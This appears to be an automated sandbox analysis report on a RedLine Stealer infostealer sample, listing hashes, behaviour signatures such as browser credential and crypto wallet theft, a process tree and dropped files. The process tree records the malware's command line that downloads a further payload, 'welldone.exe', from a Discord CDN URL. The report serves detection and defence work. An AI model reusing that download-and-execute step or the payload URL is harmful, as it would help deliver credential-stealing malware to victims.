Analysis
-
max time kernel
60s -
max time network
62s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
27-07-2021 13:20
General
-
Target
@Kypidss.exe
-
Size
92KB
-
MD5
6feb31e3fbfadaf1029223c60bc0d60c
-
SHA1
13555e90f6bd008c03403e09fcd17d6a65ab461f
-
SHA256
b059aaa7da26904746289493bcc558f552408b0a4df2e86ff8ed0c675f4dc23e
-
SHA512
5680e753eb00386413fa4352a9169b6a0d1eb13b6ae5fe9c167e9999d40634d9318fe2bc91c6f76df22f00e0dc174fc38207a601024bf9f3093e71924eef44cb
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
mine.exeextd.exeextd.exeextd.exepid process 752 mine.exe 3864 extd.exe 2848 extd.exe 3876 extd.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe upx -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ipinfo.io 16 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
@Kypidss.exepid process 652 @Kypidss.exe 652 @Kypidss.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
@Kypidss.exedescription pid process Token: SeDebugPrivilege 652 @Kypidss.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
@Kypidss.exemine.execmd.exedescription pid process target process PID 652 wrote to memory of 752 652 @Kypidss.exe mine.exe PID 652 wrote to memory of 752 652 @Kypidss.exe mine.exe PID 752 wrote to memory of 1556 752 mine.exe cmd.exe PID 752 wrote to memory of 1556 752 mine.exe cmd.exe PID 1556 wrote to memory of 3864 1556 cmd.exe extd.exe PID 1556 wrote to memory of 3864 1556 cmd.exe extd.exe PID 1556 wrote to memory of 2848 1556 cmd.exe extd.exe PID 1556 wrote to memory of 2848 1556 cmd.exe extd.exe PID 1556 wrote to memory of 3876 1556 cmd.exe extd.exe PID 1556 wrote to memory of 3876 1556 cmd.exe extd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\@Kypidss.exe"C:\Users\Admin\AppData\Local\Temp\@Kypidss.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mine.exe"C:\Users\Admin\AppData\Local\Temp\mine.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\3B75.bat C:\Users\Admin\AppData\Local\Temp\mine.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/869566660368035880/welldone.exe" "welldone.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\3B75.batMD5
31e5e4e45e645d8729a1865445a20c37
SHA10b86aee14ae577e61f98fe8683b8b3c992a6b2ff
SHA2566b06c88ef49eef9fb4f4d62952d974758384f91354f3d443cf69dc19a93e73a8
SHA512cdb82a22ace68f3a56c82151aabd86fdcac7b4d0e2f74afe866317df9fba35f86f36ed249bcc1883ac26bf0aa864490ac8064680954be29cde760d2117302b07
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeMD5
c14ce13ab09b4829f67a879d735a10a1
SHA1537e1ce843f07ce629699ef5742c42ee2f06e9b6
SHA256ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a
SHA512c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeMD5
c14ce13ab09b4829f67a879d735a10a1
SHA1537e1ce843f07ce629699ef5742c42ee2f06e9b6
SHA256ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a
SHA512c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeMD5
c14ce13ab09b4829f67a879d735a10a1
SHA1537e1ce843f07ce629699ef5742c42ee2f06e9b6
SHA256ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a
SHA512c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeMD5
c14ce13ab09b4829f67a879d735a10a1
SHA1537e1ce843f07ce629699ef5742c42ee2f06e9b6
SHA256ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a
SHA512c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38
-
C:\Users\Admin\AppData\Local\Temp\mine.exeMD5
a71e5bd022c844df2ef80234f5ad0691
SHA19ce9dc60e09c536e62fdf60bc90318fd6299dcd4
SHA256fdd3be574e0628170c34bba09040b12864014ab7701327634c202f462830981a
SHA512aaa65d7c8b10200e053f4a04ee335fb122571a291b3dd07bec298ada1f1dc77145d63336a35978d6f98a3ba6b2fd1370ae600a8f2a8206f8ac995b347107f082
-
C:\Users\Admin\AppData\Local\Temp\mine.exeMD5
a71e5bd022c844df2ef80234f5ad0691
SHA19ce9dc60e09c536e62fdf60bc90318fd6299dcd4
SHA256fdd3be574e0628170c34bba09040b12864014ab7701327634c202f462830981a
SHA512aaa65d7c8b10200e053f4a04ee335fb122571a291b3dd07bec298ada1f1dc77145d63336a35978d6f98a3ba6b2fd1370ae600a8f2a8206f8ac995b347107f082
-
memory/652-119-0x0000000004CA0000-0x0000000004CA1000-memory.dmpFilesize
4KB
-
memory/652-123-0x0000000006340000-0x0000000006341000-memory.dmpFilesize
4KB
-
memory/652-124-0x00000000068E0000-0x00000000068E1000-memory.dmpFilesize
4KB
-
memory/652-114-0x00000000003D0000-0x00000000003D1000-memory.dmpFilesize
4KB
-
memory/652-122-0x0000000006000000-0x0000000006001000-memory.dmpFilesize
4KB
-
memory/652-121-0x0000000004EF0000-0x0000000004EF1000-memory.dmpFilesize
4KB
-
memory/652-120-0x0000000004C90000-0x0000000004C91000-memory.dmpFilesize
4KB
-
memory/652-118-0x0000000004C40000-0x0000000004C41000-memory.dmpFilesize
4KB
-
memory/652-117-0x0000000004BE0000-0x0000000004BE1000-memory.dmpFilesize
4KB
-
memory/652-116-0x00000000052B0000-0x00000000052B1000-memory.dmpFilesize
4KB
-
memory/752-125-0x0000000000000000-mapping.dmp
-
memory/1556-128-0x0000000000000000-mapping.dmp
-
memory/2848-133-0x0000000000000000-mapping.dmp
-
memory/3864-130-0x0000000000000000-mapping.dmp
-
memory/3876-135-0x0000000000000000-mapping.dmp